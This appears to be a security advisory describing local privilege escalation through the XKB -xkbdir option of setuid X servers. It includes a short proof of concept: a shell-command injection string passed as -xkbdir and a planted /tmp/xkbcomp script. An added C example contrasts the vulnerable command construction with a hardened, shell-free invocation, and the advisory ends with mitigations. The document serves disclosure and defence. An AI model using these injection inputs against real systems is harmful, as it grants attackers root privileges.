COMMAND

    XKB

SYSTEMS AFFECTED

    Linux (others?)

PROBLEM

    Pavel Kankovsky posted the following.  On a system where an
    X11R6.3-based Xserver with the XKEYBOARD extension (R6.1 is probably
    affected too) is run in a setuid or setgid environment (e.g. a
    typical XFree86 installation has XF86_* installed setuid root), local
    users can exploit a "feature" of the XKB implementation to execute
    arbitrary commands with the extra privileges.  In fact, there are (at
    least) two distinct problems in the XKB implementation, both related
    to the use of the -xkbdir option:

    1. xkbcomp is invoked using system() or popen()
       - any  shell metacharacters  included in  -xkbdir argument  are
         interpreted

        $ Xserver -xkbdir ':;id > /tmp/I_WAS_HERE;'
        [exit X server]
        $ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'

    2. a user supplied instance of xkbcomp is invoked
       - xkbdir argument is used to build the path to the compiler

        $ cat > /tmp/xkbcomp
        #!/bin/sh
        id > /tmp/I_WAS_HERE
        [ctrl+d]
        $ chmod a+x /tmp/xkbcomp
        $ Xserver -xkbdir /tmp
        [X server executes /tmp/xkbcomp]
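
    The C below is an added example, not code from Kankovsky's post nor
    from the X server or XFree86 sources.  It reconstructs the shape of
    the two defects (a compiler path built from -xkbdir, then handed to
    a shell) beside a hardened invocation: a compiled-in compiler path,
    a character-set check on the directory, the user-supplied directory
    ignored whenever real and effective ids differ, and execv() with
    privileges dropped instead of system()/popen().  XKBCOMP_PATH,
    DEFAULT_XKBDIR, the argv layout and the file name server.xkb are
    assumptions made for the example; xkbcomp's real option syntax is
    not reproduced.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Compiled-in locations (hypothetical paths chosen for this example).
 * The compiler path is never derived from the -xkbdir argument. */
#define XKBCOMP_PATH   "/usr/X11R6/bin/xkbcomp"
#define DEFAULT_XKBDIR "/usr/X11R6/lib/X11/xkb"
#define XKBDIR_MAX     256

/* Vulnerable shape (illustrative reconstruction, not the server's source):
 * the -xkbdir string selects which binary runs AND is parsed by a shell
 * once the caller does system(cmd) or popen(cmd, "r").  "/tmp" makes it
 * run /tmp/xkbcomp; ':;id > /tmp/I_WAS_HERE;' makes the shell run id.
 * Returns 0 and fills cmd, or -1 if the buffer is too small. */
int build_unsafe_command(const char *xkbdir, char *cmd, size_t cmdlen)
{
    int n = snprintf(cmd, cmdlen, "%s/xkbcomp server.xkb", xkbdir);
    return (n >= 0 && (size_t)n < cmdlen) ? 0 : -1;
}

/* Accept only an absolute path built from a conservative character set
 * and containing no "..": deliberately strict, so "/a/b..c" is refused
 * too.  Returns 1 if acceptable, else 0. */
int xkbdir_is_safe(const char *dir)
{
    size_t len, i;
    if (dir == NULL || dir[0] != '/')
        return 0;
    len = strlen(dir);
    if (len >= XKBDIR_MAX || strstr(dir, "..") != NULL)
        return 0;
    for (i = 0; i < len; i++) {
        char c = dir[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '/' || c == '_' ||
                 c == '-' || c == '.';
        if (!ok)
            return 0;
    }
    return 1;
}

/* Pick the directory the compiler may read.  Real and effective ids are
 * parameters so the policy can be tested without a setuid binary: when
 * they differ, the server holds privileges the invoking user lacks, and
 * the user-supplied directory is ignored in favour of the default. */
const char *choose_xkbdir(const char *requested,
                          uid_t ruid, uid_t euid, gid_t rgid, gid_t egid)
{
    if (ruid != euid || rgid != egid)
        return DEFAULT_XKBDIR;
    if (requested == NULL || !xkbdir_is_safe(requested))
        return DEFAULT_XKBDIR;
    return requested;
}

/* Build an argv[] for execv(): the compiler path is fixed and the
 * directory is one argument, so no shell ever parses it.  The option
 * layout is illustrative, not xkbcomp's real syntax.  Returns argc. */
int build_safe_argv(const char *xkbdir, const char *argv[], int max)
{
    if (max < 4 || xkbdir == NULL)
        return -1;
    argv[0] = XKBCOMP_PATH;  /* never "<xkbdir>/xkbcomp" */
    argv[1] = xkbdir;
    argv[2] = "server.xkb";  /* constructed keymap file name */
    argv[3] = NULL;
    return 3;
}

/* Run the compiler without a shell and with privileges dropped in the
 * child.  Returns the child's exit status, or -1 on failure. */
int run_xkbcomp_safe(const char *xkbdir)
{
    const char *argv[4];
    pid_t pid;
    int status;

    if (build_safe_argv(xkbdir, argv, 4) < 0)
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* give up setgid/setuid credentials before running anything */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        execv(XKBCOMP_PATH, (char *const *)argv);
        _exit(127);          /* exec failed; no shell fallback */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmd[512];
    const char *hostile = ":;id > /tmp/I_WAS_HERE;";

    build_unsafe_command(hostile, cmd, sizeof cmd);
    printf("unsafe command line: %s\n", cmd);
    printf("xkbdir_is_safe(hostile) = %d\n", xkbdir_is_safe(hostile));
    printf("dir when setuid:     %s\n", choose_xkbdir("/tmp", 1000, 0, 100, 100));
    printf("dir when not setuid: %s\n", choose_xkbdir("/tmp", 1000, 1000, 100, 100));
    return 0;
}
```

    When real and effective ids match the user's own directory is still
    honoured: an unprivileged server reading the user's files and running
    the fixed compiler gives that user nothing beyond what they already
    have, which is the property the setuid case lacks.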

SOLUTION

    Quick fix:

        1. as usual chmod u-s,g-s all installed Xserver binaries (*)
        2. use xdm or a SAFE and PARANOID wrapper to start Xserver

        (*) and unsafe  or not-paranoid-enough setuid/setgid  wrappers
        (current Debian wrapper falls into this category)